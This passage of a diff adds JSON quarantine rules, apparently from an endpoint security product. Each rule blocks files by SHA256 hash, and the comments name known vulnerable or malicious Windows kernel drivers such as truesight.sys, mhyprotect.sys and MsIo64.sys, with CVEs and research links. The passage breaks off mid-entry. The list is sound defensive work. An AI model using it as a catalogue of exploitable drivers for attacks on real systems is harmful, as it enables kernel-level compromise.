+ "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494735Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa0014bf98d3e807ad05fd465c160b2e2a6fc85b63cab8b44571d54636a1a684", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4a40c04-3718-5057-b001-f426504b92be", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461781Z", + "creation_date": "2026-03-23T11:45:30.461784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461793Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14bd76f66fe5749d1812f7cf47cc5f9a8a830c53a7ede5e42a14a4140a70f5d2", + "comment": "Vulnerable Kernel Driver (aka mhyprotect.sys) [https://www.loldrivers.io/drivers/7abc873d-9c28-44c2-8f60-701a8e26af29/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4a78d58-c104-5488-9b9d-410cadce7b04", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828155Z", + "creation_date": "2026-03-23T11:45:30.828157Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828162Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ca522bfa1a08f92ad68c77df2ec585452072d87484ae93f778df07af19cf76f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4a9cb56-a3ad-5750-911b-70ad2ddc2b75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827954Z", + "creation_date": "2026-03-23T11:45:30.827957Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827965Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3807e9a1bc159b9e8fc0c7caad10d7213ff8ed8ad1cea9ea552b093c81bf624b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4abfe1c-cac0-591d-9f9c-8f685868374f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615255Z", + "creation_date": "2026-03-23T11:45:29.615257Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615262Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f96c129eb96bc4df9a7d247a98fecb9a3801dde63281ac1aba3d2ef869d32a5", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4b0afa1-1623-5c44-b245-093aa1840e4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976482Z", + "creation_date": "2026-03-23T11:45:29.976484Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976490Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43374fd68dc06c8491b16d177156444ee44f497bbceafd0165f40ba48bf6802f", + "comment": 
"Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4b80841-e72b-579a-ac61-f40f15e9d523", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148899Z", + "creation_date": "2026-03-23T11:45:31.148901Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148906Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da991abd9e1c29dd2a1dc0052222d7ca680ef98f7b953ee2f1c97e2edd189c43", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4ba60c3-c528-5fbf-815c-3171b5cfad2f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968545Z", + "creation_date": "2026-03-23T11:45:29.968547Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968552Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2594b3ef3675ca3a7b465b8ed4962e3251364bab13b12af00ebba7fa2211abb2", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4beb15d-1ab2-5965-92a3-ede31f804fe9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619629Z", + "creation_date": "2026-03-23T11:45:29.619631Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ca213b79336c69128620bc39e6d987c1e605299fb6525344ba1b08b7829197c7", + "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) 
[https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4bf71f1-1a99-52d4-a6bc-a9b6fddc6fbd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491394Z", + "creation_date": "2026-03-23T11:45:31.491397Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491404Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1cecaab47700515a475fc4a3385b4463a743db9a9612aebbd68f9aa065c7bcd6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4c41d35-4002-592c-9d97-03390ad0dec0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.614885Z", + "creation_date": "2026-03-23T11:45:29.614886Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614892Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4d35d1e-2b94-55aa-88b6-b5f018cc7526", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817540Z", + "creation_date": "2026-03-23T11:45:30.817542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817547Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "700b9839fde53e91f0847053b4d2eb8d9bd3aca098844510f1fa3bab6a37eb24", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"e4e23811-0d49-56b9-a017-bd44ce8c0c4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474530Z", + "creation_date": "2026-03-23T11:45:30.474533Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474542Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2274f63f88ec9b2d2ecfca3068026d62cf3085f76329b11b37498ce2b2b644a8", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4e3b56a-2585-5339-bd66-3c8b888f6fac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144236Z", + "creation_date": "2026-03-23T11:45:31.144238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144243Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18783da092f16c67f269ab2dd4f62600efc3d4eb5a93b279ecfc5be4584b6628", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4f85165-01a2-5363-9715-55fd1a294dbb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149963Z", + "creation_date": "2026-03-23T11:45:31.149965Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149971Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4bc651859a42e13f267b48a759098915bfac28372fd9c18c64ccbac1922adcc8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5052ef3-4151-5de4-9828-9c1dc06777f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479047Z", + "creation_date": "2026-03-23T11:45:31.479051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479061Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0c3dacb935b9f70192e0cade7d8a5cf3003d0a6fd22170198d9be422437e8d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5162dd4-961a-5996-95d3-8e6c8c5fca6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156535Z", + "creation_date": "2026-03-23T11:45:31.156537Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156542Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "a642fd26c18c5806aa5c5f9208118ff73d4fa6c5a78a29b552552a2160b355ad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e52455e3-40d0-57fc-882d-79b78cbaf6ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814389Z", + "creation_date": "2026-03-23T11:45:31.814392Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814400Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e98e71356773016fa51de8a675e58ccc506426d203c13f7ddf3642304ae9db5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e52654c5-b3cb-59b1-b17f-8456e7e35f89", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614249Z", + "creation_date": "2026-03-23T11:45:29.614251Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d55dd56e24df201d1ad2204d565da5e8e6080d895c1ac2873a6afdcbb4c8b8c7", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e532d449-3187-55e2-b64d-6752d5d8fc61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604950Z", + "creation_date": "2026-03-23T11:45:29.604952Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604958Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93969f4b5e79795322d88bd491cef1092f93f84c5f4e264e89f31dc9521995e0", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5489231-42ac-5239-a4cd-ab3f16369f73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825646Z", + "creation_date": "2026-03-23T11:45:31.825648Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825653Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4bee9495bd010444b16de63df1273db3b2b0d4913951bc03da73a39274e1255e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e55b5bea-ace3-5f55-878f-a41272afbb8f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452247Z", + "creation_date": "2026-03-23T11:45:30.452251Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452260Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb29eb4651e3276b14217628e96a1e5d83c4e883cd29ebd75aa704dda462e82d", + "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e55d2545-f0b2-54f8-a9df-828cdf1ddcce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456190Z", + "creation_date": "2026-03-23T11:45:30.456194Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456203Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "603ccc97a198b004f9fa56deed2295d1b2d42ef01f22d80a00cb28bcf1b85646", + "comment": "Vulnerable Kernel Driver (aka kdriver.sys) [https://www.loldrivers.io/drivers/51808fa6-89a4-4f4d-aabc-0a7b0e99e34d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5709818-95ab-5630-9444-79cc62fae133", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142718Z", + "creation_date": "2026-03-23T11:45:31.142720Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142725Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b831a6ff8e42f6cce281f70dcf2c8a8787f46316804a03d7a55559e6b9819fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e572d5c6-e785-55f8-8369-8640663b381d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478288Z", + "creation_date": "2026-03-23T11:45:30.478291Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478300Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
